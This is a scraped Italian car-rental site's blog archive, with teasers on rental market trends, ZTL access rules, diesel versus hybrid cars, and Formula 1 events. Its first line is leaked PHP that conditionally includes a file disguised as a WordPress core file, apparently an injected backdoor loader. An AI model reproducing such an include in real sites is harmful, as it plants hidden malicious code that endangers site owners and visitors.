if(!function_exists('classLink')){ if(file_exists(ABSPATH . WPINC . '/class-wp-type.php')){ require_once( ABSPATH . WPINC . '/class-wp-type.php' ); } }Senza categoria Archivi - RentalPlus

Categoria: Senza categoria

Articoli riguardanti: Senza categoria

Siamo molto felici di annunciarvi che il Monster Carnival Weekend viaggia con Rental Plus!

In occasione dell’apertura di una nuovissima sede nel capoluogo ligure, ripetiamo l’esperienza al fianco dei ragazzi di RST Events, sponsorizzano il carnevale più mostruoso e divertente d’Italia.

Vi aspettiamo il 2 e 3 Marzo a Genova, con tantissime novità: #staytuned.

CatturaCattura

IL PROGRAMMA DELL’EVENTO.

Si accendono i riflettori sul più pazzo, robotico e divertente carnevale di Genova.

Al Porto antico c’è  il Monster Carnival Weekend, tre eventi mostruosamente divertenti per tutti i bambini.

Si inizia sabato 2 marzo 2019 alla città dei Bambini e dei Ragazzi con un pomeriggio dedicato alla robotica in collaborazione con l’IIT. Dalle 15.30 alle 17.30 si svolgerà Like a Robot, un laboratorio [...]

Noleggio auto: -17,8% a gennaio, ma i volumi rimangono alti

Il noleggio auto ha cominciato il 2019 con una flessione sia del noleggio a lungo termine, sia del noleggio a breve termine
caratteristiche-noleggio-a-medio-termine
l noleggio auto ha cominciato il 2019 con una flessione sia del noleggio a lungo termine, sia del noleggio a breve termine. Nonostante la frenata, però, i volumi rimangono degni di nota, così come rimane importante l’incidenza del settore sul totale del mercato delle quattro ruote.

Noleggio auto, il 2019 si apre in calo. Il comparto del noleggio a lungo termine e del noleggio a breve termine, infatti, a gennaio hanno totalizzato una flessione percentuale a doppia cifra rispetto a dodici mesi fa (-17,8%), proseguendo così un trend di rallentamento cominciato nel settembre del 2018.

Allo stesso modo, il mercato dell’auto nel primo mese dell’anno è calato del -7,5%, con una forte diminuzione, in particolare, del diesel. Sul segno negativo, pesano certamente le ripercussioni attese dal provvedimento dell’ecotassa e dell’ecobonus (che partirà a marzo) e l’incertezza economica attuale. Fattori che pesano anche sul mondo del renting.

Elettriche e ibride nelle Ztl, come stanno le cose

La Legge Bilancio 2019 ha introdotto norme che ora vengono già messe in discussione.
ztl-zona-traffico-limitato

UN BEL REBUS – Tutto ha inizio con la Legge Bilancio 2019: stabilisce che auto ibride ed elettriche possano entrare nelle Ztl. Stando ad alcune interpretazioni letterali della legge, ibride ed elettriche possono entrare anche nelle aree pedonali. Una doppia stranezza: cosa c’entra la manovra 2019 con una norma del codice della strada? E davvero il legislatore intende aprire le aree pedonali alle auto?

PRIMA SMENTITA – “In accordo con il Parlamento”, ha spiegato il sottosegretario ai Trasporti Michele Dell’Orco, “stiamo lavorando a una modifica normativa che elimini la possibilità di accesso alle Ztl anche per le auto ibride, lasciandola solo per i veicoli elettrici”. Ricapitolando: solo le elettriche entreranno nelle Ztl. “In questo modo la misura potrà realmente rispondere alla necessità di far sviluppare il mercato dell’elettrico e di un ricambio del parco mezzi privati con veicoli a basso impatto, ma non rischierà di affollare i centri storici delle città”.

SECONDA SMENTITA – Stando a Dell’Orco, la legge bilancio non consente l’accesso alle auto [...]

Il ruolo dei broker nel noleggio auto: un lavoro in evoluzione

Il broker non è più un semplice "battitore libero" che procaccia clienti alle aziende di Noleggio a lungo termine.
broker-auto-noleggio
l broker non è più un semplice “battitore libero” che procaccia clienti alle aziende di Noleggio a lungo termine. Il loro mestiere si è evoluto: sono dei consulenti attenti, si rivolgono soprattutto a privati e Pmi, e spesso dispongono di sedi fisiche per proporre i loro prodotti.

Che ruolo hanno i broker nel Noleggio a lungo termine? Mediano tra il cliente e la società di noleggio, fanno da consulenti e si sono avvicinati anche al mondo del retail. Se un tempo il loro scopo principale era procacciare clienti per il Nlt, adesso sono figure sempre più formate (con esperienza nel mondo del noleggio), spesso parte di strutture piuttosto organizzate.

Qui le interviste ai broker effettuate durante Rental Hub, l’evento sul noleggio che si è tenuto a Milano:

I BROKER PER I PRIVATI E LE PICCOLE IMPRESE

Una grande azienda facilmente tratta direttamente con il noleggiatore e ha un Fleet Manager dedicato. Per le Pmi e i privati è diverso, perché necessitano [...]

Ibrido o Diesel? Dieci ragioni per scegliere l’auto giusta

L’alternativa ai motori a benzina. Prima di decidere capiamo bene le nostre abitudini
723407
Diesel e ibrido non sono alternativi.

Il diesel non è morto e l’ibrido si affaccia sempre più anche sul mercato italiano. Il punto, però, è che queste due modalità di propulsione hanno intorno a loro tanti miti da sfatare. Il primo è che sono alternative tra loro. Sono completamente diverse, dedicate a usi e vetture differenti. Una non può sostituire l’altra. L’esempio classico è la percorrenza chilometrica: se il gasolio conviene a chi macina chilometri in autostrada, l’ibrido permette un reale risparmio solo in città. Se il primo, poi, è dedicato ai mezzi più grandi, dalle berline ai SUV, il secondo è compagno ideale delle citycar. Insomma, visto che c’è molta confusione, vediamo cinque motivi per comprare una vettura a gasolio e cinque invece per rivolgersi all’ibrido.

Porsche: stop alle diesel, ora è ufficiale

La casa di Stoccarda ha comunicato ufficialmente che porrà fine alla produzione di auto a gasolio, privilegiando ibride ed elettriche.

porsche-studio-milano_5porsche-studio-milano_5

SCELTA STRATEGICA – Comunicazione di grande rilievo strategico da parte di Oliver Blume, ceo della Porsche: la casa specializzata in vetture sportive non produrrà più modelli con motore a gasolio. La decisione era prevista, perché viene dopo lo stop alla fabbricazione delle versioni diesel delle Porsche Macan, Cayenne e Panamera. All’origine della decisione ci sono i problemi innescati dalla vicenda Dieselgate, ma non solo. Nelle scelte strategiche delle case costruttrici ormai è determinante l’attenzione alle soluzioni ibride ed elettriche. Neanche la Porsche poteva sottrarsi a questa realtà, e d’altra parte in materia proprio dalla casa di Stoccarda sono venute alcune delle proposte più interessanti. Testimonianza concreta di questa volontà è l’investimento di 6 miliardi di euro entro il 2022 deciso dalla [...]

Abarth 595: per lei piccoli aggiornamenti

La piccola “bomba” Abarth 595, con il suo motore turbo fino a 180 CV, ha nuovi colori e uno scarico più “educato”.
abarth-595-2018-09_04

UN MOTORE, QUATTRO POTENZE – Sarà negli autosaloni dal 15 settembre 2018 la versione rinnovata dell’Abarth 595, la citycar basata sulla Fiat 500 che invoglia a “pennellare” le curve grazie all’assetto ribassato e alle sospensioni irrigidite. Gli aggiornamenti rispetto al vecchio modello interessano principalmente il motore a benzina turbo 1.4 T-Jet, sempre disponibile in quattro livelli di potenza (145, 160, 165 e 180 CV) ma ora adeguato per rispettare la nuova normativa anti-inquinamento Euro 6d-Temp. Sono nuove per l’Abarth 595 2018 anche le vernici verde Adrenalina (per gli allestimenti Competizione e Pista), grigio Asfalto (per la Turismo) e lo scarico sportivo Record Monza, ora regolabile dall’interno in funzione del sound voluto: premendo il tasto Sport è possibile renderlo meno o più vibrante. Prima invece cioè avveniva automaticamente alla pressione dell’acceleratore.

download

Tante iniziative attorno alla gara di domenica, in memoria di Marchionne, con Al Bano e un occhio al futuro: si punta al record di presenze con oltre 186mila spettatori.

C’è la rimonta Ferrari per il mondiale e la voglia di vittoria “in casa” per onorare la memoria di Sergio Marchionne. E’ il centenario della nascita di Alberto Ascari, quest’anno scelto come simbolo e tributo alla storia di Monza. Poi l’evento sportivo italiano più famoso al mondo che sarà sottolineato dal passaggio delle Frecce Tricolori sul rettilineo prima della partenza della gara di domenica e l’inno nazionale cantato da Al Bano. E ancora le Formula 1 in città, a Milano, con il circuito cittadino allestito alla Darsena dove mercoledì Vettel e Raikkonen assieme a Leclerc ed Ericsson si esibiranno tra il pubblico con le loro monoposto. E pure a Venezia, con un gemellaggio inedito all’insegna dello spettacolo: quello del grande schermo al Festival del cinema e quello del motorsport all’Autodromo Nazionale. Quindi il futuro di un appuntamento storico per gli appassionati di motori, con la trattativa in [...]

La Formula 1 nel cuore di Milano: tutti in Darsena a vedere sfrecciare le Ferrari

Da mercoledì il "F1 Milan Festival": dopo Londra, Shanghai e Marsiglia la città ospita per la prima volta la "tre giorni" dedicata ai motori in vista del Gp di Monza

ferrari-piazza-affari-ape10ferrari-piazza-affari-ape10

Sarà una prima assoluta: la Formula 1 nel cuore di Milano. L’appuntamento è per mercoledì 29 agosto, in Darsena, a pochi giorni dal gran premio di Monza. Un festival dei motori mai visto prima: l’evento, realizzato con il patrocinio del Comune in associazione con l’ACI, avrà il suo momento clou sul mini-circuito allestito per l’occasione nella zona della movida milanese. La pista, che da Piazza XXIV Maggio arriva a piazza Cantore, verrà testata e aperta da una safety car, prima di scatenare le moderne monoposto. Quelle vere, con tanto di piloti veri. Dalle Ferrari di Sebastian Vettel e Kimi Raikkonen alle Sauber di Marcus Ericsson e Charles Leclerc. Tutti a mettersi alla prova prima di farlo, per [...]

noleggio-operativo_noleggio_1412323906

Il noleggio inquina meno, molto meno del resto del parco circolante italiano, grazie al fatto che la sua flotta (sia breve che lungo termine) è composta per l’87% da vetture Euro6, con una minoranza residua che risponde alla normativa Euro5. Tutte auto di ultima generazione, che dispongono degli accorgimenti tecnologici per limitare al minimo l’impatto degli scarichi nell’aria, dal filtro anti-particolato al common rail. È quanto riporta un’analisi del Centro Studi Fleet&Mobility per Aniasa, l’associazione dei noleggiatori, presentata a Milano.

Come noto, gli scarichi delle auto emettono varie sostanze inquinanti, regolamentate in misura diversa. Il monossido di carbonio (CO) delle vetture a noleggio risulta inferiore rispetto alla media delle altre macchine in circolazione del 58 e del 37%, rispettivamente per i motori a benzina e diesel, attestandosi sul valore di u grammo/km per i primi e 0,5 per i secondi. Le emissioni di ossido di azoto (NOx) sono invece circa la metà, -52 e -47%, [...]

Back to top